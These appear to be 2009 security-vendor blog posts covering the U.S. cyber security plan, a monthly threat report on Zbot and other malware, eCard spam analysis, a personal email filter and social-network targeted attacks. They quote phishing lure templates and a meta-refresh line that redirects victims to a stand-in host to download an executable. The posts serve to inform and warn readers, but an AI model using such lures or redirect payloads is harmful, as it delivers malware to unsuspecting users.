Remember that magical, silver bullet I spoke of when discussing the U.S. cyber security plan and the future of cyber security? Well, there still is no such item in existence yet; and there likely never will be one key solution. Securing cyberspace is a global problem that can not be addressed by one plan such as this. However, if this plan is properly implemented, enforced and refactored it should be able to lead by example. It is always said that the Internet has no borders, which is an inherit problem to tackling cyber crime. Remember, this is a serious problem that spans our globe. If other governments followed suit to such an example, borders may indeed start to rise - but it will likely from a noticeably different public Internet than the one we know today.

The recently formed European Electronic Crime Task Force is an example of some of these ingredients beginning to mesh. This task force is currently composed of both the U.S. Secret Service and Italy’s policing and postal services. These components were chosen as a core with experience/resources in monitoring and defense, and the initiative goes further to openly accept contributions from other private IT operators and academic institutions. This is yet another example of the required collaboration with the private sector which I mentioned in my previous post, and indeed welcome news. While this is just another small step forward, it does help lay the groundwork required to begin effectively tackling such a large, international problem. To further refine this, more components are needed (on an international scale) - and an active effort should be placed forward from all private sectors and all other accepted sources. Then, this initial groundwork can be expanded, detailed and re-factored in an effort to generate a global, authoratative task force. I think it is very important what unfolds in the coming months, years in terms of this development; too much complication and confusion can place this framework and the state of cyber security in general in a very fragile state. Going back to the U.S. cyber security plan, I have taken the broadly laid out five points outlined by President Obama and prioritized them respectively from 1 to 5 below with comments:

1) A response plan in collaboration with local and state governments, private sector
This chimes in precisely on what I believe is the No. 1 driver towards effective cyber security. You can not have one individual person, regardless of their knowledge and experience, in charge of security - whether it is a government entity, or an enterprise IT administrator. The key is collaborating with existing resources to put all of the wheels in motion. Not only will this help with the response plan, it will directly help with proactive defense. I firmly believe part of this response plan should also be monitoring and reducing attack windows. Attacks blossom off their success because they are allowed to continue undetected months after a breach - President Obama even admitted so when his own sensitive data was compromised between a three month period (August to October).

2) An open and transparent strategy that includes metrics (milestones, progress measurements through performance)
This is a very general statement that really applies to any projects through their lifecycle. However, I believe it is very important to act on this, perform reviews regularly through existing channels (see point #1 - collaboration) to address current issues and those that are on the horizon.

3) National cyber security awareness campaign from boardroom to classes
Education is a vital piece to understanding the problems of the future, and I think educating all levels on these matters is always a good and effective proactive measure. Many succesful attacks that have been launched to date have been done through social engineering, preying on victims who simply are unaware of existing threats.

4) Private-public partnership strengthening without dictating private sector
One of the major areas which is to be addressed is protecting critical infrastructure. Yet, this section of the plan seems to place that responsibility on the private sector itself. If there is no enforcement on what is seen to be one of the most important areas to safeguard, then I think a true opportunity is being missed to develop security around this area. The private sector has been perfectly happy using legacy protocols that serve their function, and I do not think that security will be brought to the forefront without any enforcement. As I mentioned previously, one of the main problems today with SCADA networks vulnerable attack are the fact that they are not closed circuit. They are not closed circuit because they have been bridged to the public internet, and therefor the threatscape, since it is less overhead and easier to manage. With no enforcement of policy, these networks will continue to be vulnerable to attack.

5) Research and development
Research and development is what got us into this mess in the first place: security was not placed in mind, and growth was important. Thus, software quickly became complex and integrated, allowing cyber criminals to attack. Even though it was not mentioned, I believe the key to R&D is in the secure development lifecycle - think of all the prevalent problems that could be easily addressed through design (XSS, buffer overflows, etc).

There was quite a bit of movement on the Threatscape this period, which I have summarized below. For more detail, our June 2009 Threatscape report can be found on Fortinet’s FortiGuard Center.

Web threat traffic in general rose significantly, with a noticeable difference in Malware and Phishing. Looking at period over period growth from last report, Phishing and Malware web traffic growth was at the highest yet, both posting significant gains. These gains represent more volume directed towards malicious sites, an ongoing trend as we continue to pave the way into the next generation of online services and threats. In tune with an increase of web-borne malware, total malware detections have also been steadily increasing. While total malware detections have been increasing since March 2009, distinct volume (unique pieces of malicious code) detection remains relatively flat. Cyber criminals have been enjoying success by driving mass amounts of traffic to their threats, aided by a large online community utilizing a vast amount of vulnerable services.

For the first time in a while, Netsky has been knocked out of our Malware Top 10 list. Two of the main threat drivers we have seen this year, Online Gaming Trojans and Virut, remain very active with Online Gaming Trojans in first and tenth position this report. W32/Virut.A, though falling two positions, held a strong fourth place amongst a barrage of Zbot activity. Two Zbot variants, W32/Zbot.M and W32/Zbot.V landed in second and third position respectively. Zbot, a very widespread and prevalent keylogging / data siphoning trojan, was particularly active this month distributing its payload through fake eCard mail. The largest surge of Zbot activity occurred on June 2nd and June 12th, with W32/Zbot.M and W32/Zbot.V each going on two-day runs. Interestingly, JS/PackRedir.A moved up thirty-six positions to land in fifth place in our Malware Top 10 list. This obfuscated javascript redirects unfortunate visitors to further malicious sites that host malicious components through PDF and SWF files. This underscores the popularity of obfuscated attacks, whether it be through binary packers or script obfuscators - and also helps contribute to the aforementioned growth in web-borne Malware attacks.

Building off a year high active exploitation rate of 46.4% last report, 62 of 108 reported vulnerabilities this period had exploits launched against them. Over half of new reported vulnerabilities this period have been attacked, with a 57.4% active exploitation rate. This is certainly a disturbing trend: exploits typically are not easy to write, and take considerable time and effort - unless you have resources at your disposal. With more attacks being launched against vulnerabilities, shown through a very high active exploitation rate, users need to be extra cautious on where they direct their web browsers. Many attacks are launched through this vector; remember to apply patches to guard against attacks like poisoned documents.

Spam rates remained consistent in June, with no direct effect following an applaudable take-down of 3FN/Pricewert, another alleged spam-centric network. Last November, after the infamous McColo went down, we saw quite a dip in spam rates that took more than two months to recover. France took top spot for regional received spam, with Canada and Spain respectively entering in fourth and fifth position. The Canadian Pharmacy gang and other campaigns are frequently using simple HTM file attachments to hook users. The HTM files generally contain this content form: <meta http-equiv=’Refresh’ content=’0; url=hxxp://maldomain.com/malfile.exe’ />

We have been receiving lots of spam in June with the age-old, eCard social engineering hook. The messages show up with these subject headers:

“You have received an eCard”
“You have received a greeting ecard”
“You Have Received a Greeting Card”

The bodies are all very simple, one piggybacking on the trusted name ‘123greetings.com’ while the others being more simple instructing the recipient to open the eCard to view. All traced malware variants are related to the ZBot family, or W32/Branvine.A!tr.dldr. The latter downloads Privacy Center (detected by Fortinet as W32/PCenter.A!tr), yet another fake security software (scareware) suite. We first discussed Scareware at the height of its entry surge in September 2008. Ten months later, the spam campaigns still roll in. The campaign used two different attack methods with similar templates, one being the traditional attachment and the other malicious links:

Template 1 Snippet:
“Send free ecards from 123greetings.com with your choice of colors, words and music.
Your ecard will be available with us for the next 30 days. If you wish to keep the ecard longer, you may save it on your c
computer or take a print.

To view your ecard, open attached zip file”

Template 2 Snippet:
“To pick up your eCard, click on the following link (or copy & paste it into your web browser):
hxxp://method{removed}.com/
Your card will be aviailable for pick-up beginning for the next 30 days.”

Template 3 Snippet:
“To pick up your eCard, open attached file
We hope you enjoy you eCard.”

There are plenty of common red flags to pick up on here:
a) A link to a non-greeting card domain. Inspecting domains before following links will help - you can use our free URL lookup utility here:
http://www.fortiguardcenter.com/webfiltering/webfiltering.html#urllookup
b) Typos - Common with all spam to bypass filtering, also genuine errors
c) eCard Attachments. Most, if not all, operating eCard companies do not supply eCard attachments (especially executables!) since they usually use an interactive site.

Can you spot another? To help users follow malicious links, spam mail often contains instructions to “copy & paste” the URL into your web browser. Sometimes, they emphasize this - check out this latest received image (in a spam mail) from Canadian Pharmacy. Typing this into your address bar will only lead you to a fast flux hosted proxy serving up fraudulent pills. Of course, the images are used as an effort to bypass spam detection:

Early this month we saw the closure of 3FN, an ISP taken down by the FTC due to complaints of malicious activity, with the hopes of a second rally for the good guys after McColo’s significant impact (reduction of spam) when it went offline in November 2008. Looking at our systems, we have seen no significant change: spam rates are just as high as they were in May 2009, maintaining a steady volume much higher than we saw in December 2008 post McColo. So, what does that mean? Traditional spam is not going away anytime soon. Always be careful following links, and do some quick research on domains ahead of time (ie: use our mentioned tool, or do a quick search using your favorite engine).

I don’t know if you encounter the same problem as I, but I keep on receiving spam from people I however do like (friends, family, etc). You know, the kind of awfully nice people that nonetheless strangely feels compelled to forward their own rubbish: hoaxes, chain letters, petitions, jokes and, of course, a full load of lengthy attachments.

This is a real nuisance, yet I cannot report them to online spam fighting websites, nor simply black list them: from time to time, among other mails, they do send interesting stuff (personal news, cool invitations), and also, they mean no harm, it’s just most of the time they are so convinced their e-mail will actually save an endangered specie they feel they have to forward it… Of course, I *did* try to educate them, telling them all of this was fake, providing URLs to check whether a mail is a hoax or not, explaining their Happy New Year message would be as fine in pure text rather than in a flashy PowerPoint slideshow. Let’s face it: I failed. So, I now decided to move on to another solution: the Friendly Automatic Filter and Answering Machine.

The idea is very simple: for all friends/families,
1. Filter out e-mails with banned extensions (in my case: pps, doc, exe, ppt)
2. Also filter e-mails which are too long (ex: people sending images they forget to scale down)
3. Automatically send an e-mail to the sender, telling him part of his message has been blocked and I will not be reading the attachment.

Actually, I spent a long time searching for such a tool on the Internet, but I could not find anything: mail clients such as Thunderbird or Alpine do not support customization of automatic answers (for example, message body containing sender’s name and time and date of his email), Gmail filters only detect whether there is an attachment or not, but not which kind, and anti-spam tools are designed to delete the filtered message, not to answer it (indeed, in most cases, you must not answer to spam!) nor to filter out only attachments. I finally started writing a very simple Perl script to handle the case. It’s really basic, but it already saves me time.

Interested in trying this yourself? Get the script here.

While the next generation of tech has arguably arrived, it is simply a fact now that social networking sites and the blogosphere have become an integrated part of many peoples lives - some may even call them home (at least to their browsers). In 2008, we predicted the wave of spam that would hit these “Web 2.0″ platforms as it was a natural target for spam to migrate to after years of living inside of mass mailers. Indeed, throughout the year of 2008 we witnessed a barrage of attacks on these sites: malicious social applications, “Spam 2.0“, worms such as Koobface, XSS exploits, and various phishing campaigns. Here we are, a year and a half later and the spam attacks not-surprisingly continue.

Amongst all of this activity, more platforms with further complexity continue to arise and gain popularity, such as micro-blogging site Twitter. Naturally, some of the similar aforementioned attacks have followed as well. One of the effective mechanisms of next-generation worms traversing through linked accounts on social networking sites is that malicious links are sent out from one connected contact to another. Since most of these contacts presumably know each other, there is a higher level of trust - and a tendency for any recipient to let their guard down when clicking on these links. Most threat activity we have seen on social networking sites come from harvested accounts, from worms like Koobface and phishing campaigns. These accounts are typically used in ad-hoc fashion to blast out messages or invites to their contacts. Mass mailers, now typically hosted on botnets, follow the same pattern: they harvest accounts, and send out spam to as many contacts as possible - and have been doing this for a very long time. Enter targeted attacks.

There has been an increasing trend of targeted attacks, ones that are premeditated and delivered to usually only a handful of recipients, if not just one. These are often delivered as poisoned documents that trigger exploits, and drop malware such as keylogger trojans. For a detailed investigation, you may read further here. In parallel with the increasing targeted attack front, we have witnessed an increase in document exploit activity. Figure 1 below shows a 6 month window of detected activity for common exploited document formats: XLS, DOC, and PDF:

With the amount of attacks that are circulating on next generation platforms, “Web 2.0″, whatever you want to call it - it is only a matter of time until cyber criminals become more aggressive and innovative with their methods. They have already started this transition and are in full-swing with targeted attacks through traditional e-mail, so it is likely that they will follow suit and expand their horizons to new channels. Harvested accounts from social networks are primed for targeted attacks, and in theory would be even more effective than the already dangerous targeted attacks through traditional e-mail. This is because of several factors:

1. Social networks host a wealth of information that would assist in social engineering hooks (think personal information and profiles, messages archived / posted, etc)
2. User bases have exploded on popular social network sites, and everybody is participating: from end users, celebrities / officials and enterprise (marketing, PR, executives, the list goes on)
3. Next generation platforms not only support the basic attack vectors that e-mail does (files and malicious links), but offer much more opportunities for attack, innovation and expansion
4. As I already pointed out, social networking rings / established contacts have a high degree of trust already

Framework is already in place to siphon account credentials with ease, as we have witnessed over the last year. With favored targeted attack methods becoming quite active (Figure 1 - poisoned documents), and ample opportunity on the horizon, it is suffice to say that the Internet is indeed a scary and hostile place. Always try to validate the identity of any contact, especially when file attachments or malicious links are involved.